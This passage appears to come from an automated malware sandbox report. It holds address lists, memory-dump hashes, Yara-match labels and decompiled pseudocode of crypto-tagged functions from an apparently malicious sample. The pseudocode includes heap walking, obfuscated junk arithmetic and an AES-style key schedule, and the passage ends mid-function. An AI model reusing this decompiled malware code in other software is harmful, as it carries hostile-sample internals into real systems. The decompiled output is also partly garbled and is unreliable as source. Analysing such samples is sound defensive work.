0x014e2944
0x014e2944
0x014e2948
0x014e294a
0x014e2950
0x014e2953
0x014e2958
0x00000000
0x00000000
0x014e295a
0x014e2962
0x014e2965
0x014e2976
0x014e2978
0x014e29e0
0x014e29e4
0x014e29e6
0x014e29e8
0x014e29eb
0x014e2993
0x014e2993
0x00000000
0x014e2993
0x014e29ed
0x014e29ef
0x00000000
0x00000000
0x014e29f1
0x00000000
0x014e29f1
0x014e297a
0x014e299b
0x014e299d
0x014e29f5
0x014e29fb
0x014e29fb
0x014e2a00
0x014e2a04
0x014e2a04
0x014e2a06
0x014e2a13
0x014e2a13
0x014e2a18
0x014e2a44
0x014e2a44
0x014e2a44
0x014e2a46
0x014e2a50
0x014e2a5a
0x014e2a5e
0x014e2a99
0x014e2a9e
0x014e2aa0
0x014e2a70
0x014e2a70
0x014e2a72
0x014e2a75
0x014e2a82
0x014e2a89
0x014e2a89
0x014e2a7a
0x014e2a7f
0x014e2a7f
0x014e2a7f
0x00000000
0x014e2a7f
0x014e2aa4
0x014e2aa4
0x014e2ab6
0x014e2abd
0x014e2ac0
0x014e2ac4
0x014e2ac6
0x014e2ac9
0x014e2acf
0x014e2ad1
0x014e2ad3
0x014e2ad3
0x014e2ad3
0x014e2acf
0x014e2ad6
0x014e2ad9
0x014e2adb
0x014e2add
0x014e2af9
0x014e2af9
0x014e2aff
0x014e2adf
0x014e2adf
0x014e2ae7
0x014e2aea
0x014e2aef
0x014e2af4
0x014e2af4
0x014e2b01
0x014e2b05
0x014e2b08
0x014e2b08
0x014e2b0d
0x014e2b11
0x014e2b1b
0x014e2b20
0x00000000
0x014e2b11
0x014e2a60
0x014e2a61
0x014e2a6b
0x00000000
0x014e2a6b
0x014e2a1f
0x014e2a25
0x014e2a25
0x014e2a27
0x014e2a38
0x014e2a3d
0x014e2a3d
0x014e2a3f
0x014e2a3f
0x00000000
0x014e2a3f
0x014e2a2c
0x014e2a2c
0x014e2a31
0x00000000
0x00000000
0x014e2a36
0x014e2a36
0x00000000
0x014e2a36
0x014e2a0c
0x00000000
0x014e2a0c
0x014e29a1
0x014e29a4
0x014e29a4
0x014e29b0
0x014e29b5
0x014e29b9
0x00000000
0x014e29bf
0x014e29c3
0x014e29c6
0x014e29c6
0x014e29cd
0x014e29d3
0x014e29d8
0x00000000
0x014e29d8
0x014e29b9
0x014e2980
0x014e2983
0x014e2990
0x00000000
0x014e2989
0x014e2989
0x014e298c
0x014e298c
0x014e2995
0x014e2995
0x014e2999
0x014e2999
0x00000000
0x014e2999

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e7934c4bc3671cc04a15008d5937152af1da6eb1ac19e9098735c2bc73a494
Instruction ID: 0536c2cb683141101a2e73a3b152d8b0bf52028ea259d9a3a5832763980dfbc3
Opcode Fuzzy Hash: f3e7934c4bc3671cc04a15008d5937152af1da6eb1ac19e9098735c2bc73a494
Instruction Fuzzy Hash: 2F710331A0011A9BDB25CF69C888F7FBBFAEF58251F14816AD811D73A0DBB4D942C790

Uniqueness

Uniqueness Score: -1.00%

Function 014D1002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E014D1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1505898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x15058b0 = _t128;
								 *0x15058b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x15058b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x15058bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x15058bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x15058b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1505898 = 7;
										return _t75;
									} else {
										 *0x1505898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1505898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x014d1002
0x014d100c
0x014d100f
0x014d1012
0x014d1018
0x00000000
0x014d102e
0x014d1030
0x00000000
0x014d1032
0x014d1032
0x014d1038
0x014d1038
0x014d121e
0x014d11ff
0x014d1205
0x014d1207
0x014d120c
0x014d120e
0x014d1210
0x014d1212
0x014d1212
0x014d1210
0x014d121c
0x014d121c
0x014d1228
0x014d1228
0x014d101c
0x014d101c
0x014d101c
0x014d101f
0x014d1022
0x014d1025
0x014d102c
0x014d102c
0x00000000
0x014d102c
0x014d1027
0x014d102a
0x014d103f
0x014d103f
0x014d1042
0x014d1044
0x014d1047
0x014d1049
0x014d104c
0x014d104e
0x014d1088
0x014d1088
0x014d108a
0x014d108d
0x014d108f
0x014d1091
0x014d1091
0x014d1093
0x014d1095
0x014d1097
0x014d10c8
0x014d10cb
0x014d10ce
0x014d10d0
0x014d10f4
0x014d10f4
0x014d10fa
0x014d1100
0x014d1102
0x014d1150
0x014d1150
0x014d1154
0x014d1167
0x014d116a
0x014d116a
0x014d1156
0x014d1156
0x014d1158
0x014d115b
0x014d115d
0x014d115f
0x014d115f
0x014d115f
0x014d1162
0x014d1162
0x014d116c
0x014d116f
0x014d1171
0x014d117b
0x014d117b
0x014d117d
0x014d1183
0x014d1183
0x014d1186
0x014d1188
0x014d1199
0x014d118a
0x014d118a
0x014d118c
0x014d118f
0x014d1191
0x014d1191
0x014d1191
0x014d1194
0x014d1194
0x014d119c
0x014d11a2
0x014d11a8
0x014d11ac
0x014d11af
0x014d11c7
0x014d11b1
0x014d11b1
0x014d11b4
0x014d11b7
0x014d11b9
0x014d11b9
0x014d11b9
0x014d11bc
0x014d11c2
0x014d11c2
0x014d11cb
0x014d11ce
0x014d11d4
0x014d11e7
0x014d11ed
0x014d11ef
0x00000000
0x00000000
0x014d11f1
0x00000000
0x014d11d6
0x014d11d6
0x00000000
0x014d11d6
0x014d11d4
0x014d1104
0x014d1106
0x00000000
0x00000000
0x014d1108
0x014d110c
0x014d111d
0x014d110e
0x014d110e
0x014d1110
0x014d1113
0x014d1115
0x014d1115
0x014d1115
0x014d1118
0x014d1118
0x014d1126
0x014d113a
0x014d113d
0x014d113f
0x00000000
0x014d1141
0x014d1141
0x00000000
0x014d1141
0x014d113f
0x014d10d6
0x014d10d9
0x014d10dd
0x014d10e3
0x014d10e6
0x014d10e9
0x00000000
0x00000000
0x014d10ee
0x014d10f0
0x014d10f2
0x00000000
0x00000000
0x00000000
0x014d10f2
0x00000000
0x014d1099
0x014d1099
0x014d109c
0x014d109c
0x014d109e
0x014d10a0
0x014d10b3
0x014d10a2
0x014d10a2
0x014d10a4
0x014d10a7
0x014d10a9
0x014d10ab
0x014d10ab
0x014d10ab
0x014d10ae
0x014d10ae
0x014d10b6
0x014d10b9
0x00000000
0x00000000
0x014d10be
0x014d10c1
0x014d10c3
0x00000000
0x00000000
0x00000000
0x014d10c3
0x014d10c5
0x00000000
0x014d10c5
0x014d1097
0x014d1050
0x014d1053
0x014d1056
0x014d1059
0x014d105c
0x014d105e
0x014d1060
0x014d1062
0x014d1064
0x014d1064
0x014d1062
0x014d1066
0x014d1069
0x014d106b
0x014d106d
0x014d106f
0x014d1076
0x014d1076
0x014d1076
0x00000000
0x014d1076
0x014d1071
0x014d1074
0x00000000
0x00000000
0x00000000
0x014d1074
0x014d1079
0x014d1079
0x014d107b
0x014d107b
0x014d107f
0x014d1082
0x014d1085
0x00000000
0x014d1085
0x00000000

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0dbce841d2ab7e6de23c89eea47724b3d6b3a4134c7e05f61ed90020adf646
Instruction ID: 56fc1f5aaae4fcf3a703a030dfd71d5dacf542ad75581a30ab77a69e6f0767a3
Opcode Fuzzy Hash: fb0dbce841d2ab7e6de23c89eea47724b3d6b3a4134c7e05f61ed90020adf646
Instruction Fuzzy Hash: 8371BE74A00262CBDF25CF69C4A063AB7F1FF48B00B68486FDD928B760E771A955DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041E3B6, Relevance: .2, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E0041E3B6(signed char __eax, signed int __ebx, signed int __ecx, signed int __esi) {
				void* _t24;
				signed char _t32;
				signed int _t33;
				signed int _t38;
				signed char _t40;
				signed int _t43;
				signed int _t46;
				void* _t48;
				signed int _t50;
				signed int _t56;
				signed int _t58;
				signed char _t62;

				_t50 = __esi;
				_t33 = __ecx;
				_t23 = __eax;
				asm("sbb esp, [0xcc32c1de]");
				asm("rol byte [0x16efa8e0], 0x83");
				asm("rol byte [0xb4a0470c], 0x6c");
				 *0xc2ccecc9 =  *0xc2ccecc9 & __ebx;
				_pop(_t43);
				_t56 = 0x16d24939;
				_t38 = 0xefa8e0cc;
				asm("adc esi, 0x93b70016");
				_t32 = __ebx - 1;
				_t62 = _t32;
				if(_t62 < 0) {
					L1:
					asm("rcl byte [0x939ff7b7], 0x75");
					asm("rol byte [0x8f83e7b0], 0x96");
				} else {
					_pop(__edi);
					__edi = __edi |  *0x16d24939;
					asm("adc [0xfb45494], eax");
					__ebp = __ebp + 1;
					if(__esi > 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												goto L1;
											} while (_t62 == 0);
											_push(0xdc624d74);
											_t43 = _t43 -  *0xc419e217;
											asm("adc ecx, [0x84e5c4bb]");
										} while (_t43 != 0);
										asm("adc edi, [0xdd634e75]");
										asm("adc cl, 0x2");
										_t33 = _t33 & 0x000000b0;
										asm("scasb");
									} while (_t33 >= 0);
									 *0xe77cd173 =  *0xe77cd173 >> 0xe3;
									asm("lodsb");
									_pop( *0x2f9d1616);
									asm("sbb dl, 0x1c");
									 *0x32c1ddbd =  *0x32c1ddbd - _t32;
									_t43 = (_t43 & 0xef4544a1) -  *0x85c02c16;
									asm("sbb [0xb2efca25], esp");
									_t38 = _t38 |  *0xa8e0cc32;
									 *0xc6a616ef =  *0xc6a616ef ^ _t23;
									_t56 = _t56 + 1;
									_t33 = _t33 ^  *0xc1daa919;
									asm("adc cl, [0xa8e0cc32]");
									 *0xc83916ef =  *0xc83916ef << 0xbf;
								} while ( *0xc83916ef != 0);
								_t23 = _t23 &  *0xd8a8c4a8;
								_t50 = _t50 ^  *0x8b7a16ef;
								_t56 = _t56 + 0x00000001 &  *0xc68ff209;
								asm("sbb [0xe0cc32c1], ebx");
								_t38 = _t38 - 0xa8;
								 *0xc83816ef =  *0xc83816ef ^ _t38;
							} while ( *0xc83816ef != 0);
							 *0x52173a7b =  *0x52173a7b >> 0x38;
							_t24 = _t23 + 1;
							_push(_t24);
							asm("rcr byte [0x4052173a], 0x22");
							_push(_t24);
							_t40 = 0x81d04116 &  *0xef45d88d;
							asm("adc [0x4052173a], dh");
							 *0xef45d88d = _t50;
							_t32 = _t32 |  *0xaddd0fb4;
							asm("adc ebx, [0x87dbae16]");
							asm("sbb ebx, [0x1db40ffd]");
							 *0x2b16efa8 =  *0x2b16efa8 >> 0x36;
							asm("ror dword [0xbe0b1c6d], 0xb6");
							asm("ror dword [0xcc32c1ef], 0xaa");
							 *0x8a16efa8 =  *0x8a16efa8 | _t40;
							asm("sbb edx, 0xcc32bfdd");
							_t58 = 0xef45d88d + _t58 &  *0xefa8e0cc;
							 *0xfa34f216 =  *0xfa34f216 << 0x68;
							 *0xcc32b9d9 = _t24;
							asm("sbb [0x67b3c621], edx");
							_push( *0xc0d601ee);
							_pop(_t46);
							asm("stosb");
							 *0x395f828e =  *0x395f828e << 0x7d;
							asm("sbb cl, 0x14");
							 *0x32ccebb8 =  *0x32ccebb8 >> 0x71;
							_t56 = _t56 ^ 0xefa8e0cc;
							 *0x8ce2a816 = _t46;
							asm("sbb dl, [0xa8e0cc32]");
							 *0x9e8e16ef =  *0x9e8e16ef - _t58;
							_t23 = 0xd79c0126;
							asm("rcr byte [0xba16efa8], 0x2e");
							asm("sbb dh, 0xf9");
							 *0x395fc3cc =  *0x395fc3cc |  *0x8ce2a816;
							_t33 = _t33 +  *0x16efa8e0 - 1 + 0xd2 +  *0xaece9d8d - 1;
							asm("rcl dword [0x9c420816], 0x9b");
							asm("stosd");
							 *0x32baf2c1 =  *0x32baf2c1 | _t56;
							asm("sbb eax, [0xefa8e0cc]");
							 *0x983e0416 =  *0x983e0416 << 0x3b;
							asm("cmpsw");
							_t50 = ( *0xef45d88d |  *0x9cba1d16 |  *0x453d99a1) &  *0xbe17ff2f &  *0x16d24939 & 0xbed3f5bd;
							_t48 = 0x81c42916;
							 *0x16d24939 =  *0x16d24939 << 0x44;
							 *0x71c621c =  *0x71c621c | 0xd79c0126;
							asm("movsb");
							_t38 = (_t40 - 0x000000e2 ^  *0xe0cc32c1) +  *0x16efa8e0;
							 *0x7c73a2fe =  *0x7c73a2fe >> 0xca;
							 *0xc4a8009a =  *0xc4a8009a - _t33;
							asm("adc bl, 0xa8");
							asm("adc esi, 0x16ef45d8");
							 *0x9ba0f4be =  *0x9ba0f4be - _t48;
							 *0xa899d1b4 =  *0xa899d1b4 + 0xd79c0126;
							_t43 = 0xcc32c1db;
							 *0x16d24939 =  *0x16d24939 & _t33;
						} while ( *0x16d24939 != 0);
						return 0xd79c0126;
					} else {
						_push(0xa8008977);
						 *0x45d8a8c4 =  *0x45d8a8c4 & __ecx;
						__ebx = __ebx ^  *0x9e3f16ef;
						_t21 = __ecx;
						__ecx =  *0x40ecb2a1;
						 *0x40ecb2a1 = _t21;
						__ecx =  *0x40ecb2a1 &  *0xd68f16ef;
						asm("adc al, [0x826380]");
						asm("rol byte [0xd8a8c4a8], 0xf8");
						__ebp = __ebp + 1;
						 *0x121f16ef =  *0x121f16ef << 0xa1;
						_t22 = __eax;
						__eax =  *0xf9e2bbc;
						 *0xf9e2bbc = _t22;
						__ebp = __ebp & 0x40ecb2a1;
						 *0xcc319fe2 =  *0xcc319fe2 & __ah;
						 *0x5fc2ccf0 =  *0x5fc2ccf0 >> 0xfb;
						__ecx =  *0x40ecb2a1 &  *0xd68f16ef ^  *0x16d24939;
						asm("adc edi, [0x2e339416]");
						return  *0xf9e2bbc;
					}
				}
			}

0x0041e3b6
0x0041e3b6
0x0041e3b6
0x0041e3b6
0x0041e3bc
0x0041e3c3
0x0041e3ca
0x0041e3d0
0x0041e3d1
0x0041e3e3
0x0041e3e9
0x0041e3ef
0x0041e3ef
0x0041e3f0
0x0041e14a
0x0041e14a
0x0041e151
0x0041e3f6
0x0041e3fc
0x0041e3fd
0x0041e408
0x0041e414
0x0041e41c
0x00000000
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x0041e14a
0x00000000
0x00000000
0x0041e15a
0x0041e15f
0x0041e165
0x0041e165
0x0041e16e
0x0041e177
0x0041e17a
0x0041e17d
0x0041e17d
0x0041e180
0x0041e187
0x0041e18e
0x0041e194
0x0041e197
0x0041e1a3
0x0041e1a9
0x0041e1af
0x0041e1b5
0x0041e1bb
0x0041e1bc
0x0041e1c2
0x0041e1c8
0x0041e1c8
0x0041e1db
0x0041e1e2
0x0041e1e8
0x0041e1ee
0x0041e1f4
0x0041e1f7
0x0041e1f7
0x0041e203
0x0041e20a
0x0041e20b
0x0041e217
0x0041e21e
0x0041e21f
0x0041e22a
0x0041e231
0x0041e23e
0x0041e24a
0x0041e262
0x0041e26d
0x0041e274
0x0041e27b
0x0041e285
0x0041e291
0x0041e2a8
0x0041e2ae
0x0041e2bb
0x0041e2c7
0x0041e2cd
0x0041e2d3
0x0041e2e0
0x0041e2e4
0x0041e2f5
0x0041e2f8
0x0041e2ff
0x0041e305
0x0041e311
0x0041e317
0x0041e31d
0x0041e329
0x0041e336
0x0041e339
0x0041e33f
0x0041e343
0x0041e34a
0x0041e34b
0x0041e351
0x0041e357
0x0041e35e
0x0041e360
0x0041e366
0x0041e367
0x0041e36e
0x0041e374
0x0041e37a
0x0041e380
0x0041e387
0x0041e38d
0x0041e390
0x0041e396
0x0041e39c
0x0041e3a2
0x0041e3a3
0x0041e3a3
0x0041e3b5
0x0041e422
0x0041e422
0x0041e427
0x0041e42d
0x0041e439
0x0041e439
0x0041e439
0x0041e441
0x0041e447
0x0041e44d
0x0041e454
0x0041e455
0x0041e45c
0x0041e45c
0x0041e45c
0x0041e462
0x0041e46e
0x0041e474
0x0041e47b
0x0041e481
0x0041e487
0x0041e487
0x0041e41c

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5dde481291b37c87f811ca0d51bad905d84563c0648f0f60fbd6a4a27ab2f2
Instruction ID: 224841a5a7a22b87606220cb037f87a55ebc41c28857537f945225989de977ab
Opcode Fuzzy Hash: 5f5dde481291b37c87f811ca0d51bad905d84563c0648f0f60fbd6a4a27ab2f2
Instruction Fuzzy Hash: E3812336948381DFEB05DF78D8966853FB1F786330B09438EC9A1971D2D37820A6CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00402D90, Relevance: .2, Instructions: 165
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}

0x00402d93
0x00402d98
0x00402da0
0x00402da9
0x00402db3
0x00402dba
0x00402dc3
0x00402dce
0x00402dd6
0x00402ddf
0x00402dea
0x00402df0
0x00402df5
0x00402dfe
0x00402e09
0x00402e11
0x00402e1a
0x00402e25
0x00402e2d
0x00402e36
0x00402e41
0x00402e49
0x00402e52
0x00402e5d
0x00402e65
0x00402e6e
0x00402e80
0x00402e83
0x00402f9f
0x00402fa4
0x00402e89
0x00402e89
0x00402e8c
0x00402e8e
0x00402e91
0x00402e91
0x00402ef6
0x00402efb
0x00402efd
0x00402f03
0x00402f05
0x00402f0b
0x00402f0d
0x00402f10
0x00402f16
0x00000000
0x00000000
0x00402f72
0x00402f78
0x00402f7a
0x00402f80
0x00402f82
0x00402f87
0x00402f88
0x00402f8b
0x00402f8e
0x00402f91
0x00402f97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f97
0x00402fae
0x00402fae
0x00000000

Memory Dump Source

Source File: 00000001.00000002.285724875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0041D27D, Relevance: .1, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E0041D27D(signed char __ebx, signed char __ecx, void* __edi) {
				signed char _t18;
				signed char _t20;
				signed char _t22;
				void* _t24;
				signed int _t26;

				_t22 = __ecx;
				_t18 = __ebx;
				_t17 =  *__ebx() | 0x84f07e78;
				 *0xd4222c28 =  *0xd4222c28 >> 0xe5;
				if(( *__ebx() | 0x84f07e78) <= 0) {
